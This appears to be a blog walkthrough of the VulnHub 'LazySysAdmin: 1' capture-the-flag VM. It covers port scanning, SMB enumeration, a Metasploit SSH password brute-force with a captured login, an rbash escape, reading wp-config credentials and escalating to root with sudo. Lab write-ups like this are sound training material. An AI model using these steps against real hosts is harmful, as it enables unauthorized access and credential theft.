Back once again with another vulnhub writeup, you guys seem to like these and a load of new VM’s were added that currently don’t have any.
As you can tell by the title this one is for “LazySysAdmin: 1”
My setup is as follows:
Attacker: 192.168.1.135
Target: 192.168.1.142
Firstly I did a portscan, this revealed the following:
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
6667/tcp open irc syn-ack ttl 64 InspIRCd
being a web guy the first thing I did was load up a browser, burp suite and browse the site. Not much of interest was there. So launched Nikto and dirb.
These found some folders that had directory listing enabled, but no useful content.
/info.php contained phpinfo();
/wordpress/ had a wordpress blog
/phpmyadmin/ contained phpmyadmin
I then fired wpscan against /wordpress/ with nothing useful found except a username of “admin”.
I then ran enum4linux against the box which revealed the following:
Looking up status of 192.168.1.142
LAZYSYSADMIN <00> - B Workstation Service
LAZYSYSADMIN <03> - B Messenger Service
LAZYSYSADMIN <20> - B File Server Service
WORKGROUP <00> - B Domain/Workgroup Name
WORKGROUP <1e> - B Browser Service Elections
[+] Got OS info for 192.168.1.142 from srvinfo:
LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server
platform_id : 500
os version : 6.1
server type : 0x809a03
//192.168.1.142/print$ Mapping: DENIED, Listing: N/A
//192.168.1.142/share$ Mapping: OK, Listing: OK
//192.168.1.142/IPC$ Mapping: OK Listing: DENIED
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
S-1-22-1-1000 Unix User\togie (Local User)
The most useful here being the username of “togie”
On a hunch I decided to try to bruteforce the SSH service with this username:
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.142 RHOSTS => 192.168.1.142 msf auxiliary(ssh_login) > set USERNAME togie USERNAME => togie msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf auxiliary(ssh_login) > set PASS_FILE /opt/wordlists/rockyou.txt PASS_FILE => /opt/wordlists/rockyou.txt msf auxiliary(ssh_login) > run [+] 192.168.1.142:22 - Success: 'togie:12345' 'uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux ' [*] 192.168.1.142 - Command shell session 1 closed. Reason: Died from EOFError [*] Command shell session 1 opened (192.168.1.135:36709 -> 192.168.1.142:22) at 2017-10-05 16:09:05 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
well that was easy! after SSHing in it quickly became apparent that I was in a restricted “rbash” shell.. this was trivial to break out of:
togie@LazySysAdmin:~$ cd .. -rbash: cd: restricted togie@LazySysAdmin:~$ bash togie@LazySysAdmin:~$ cd .. togie@LazySysAdmin:/home$
from there I was able to read the wp-config.php files and gain access to phpmyadmin and wordpress (both used the same credentials), there were some other files of note in the webroot which I really should have found earlier!
Time to get root. I fired up “python -m SimpleHTTPServer” on my attacker VM and on the victim ssh downloaded linuxprivchecker.py and LinEnum.sh
After running them it quickly became apparent the user had sudo privs. A quick “sudo sh” and viola I was root. cd to /root and see proof.txt
root@LazySysAdmin:~# cat proof.txt WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
All in all this was a fun boot2root, thanksĀ @togiemcdogie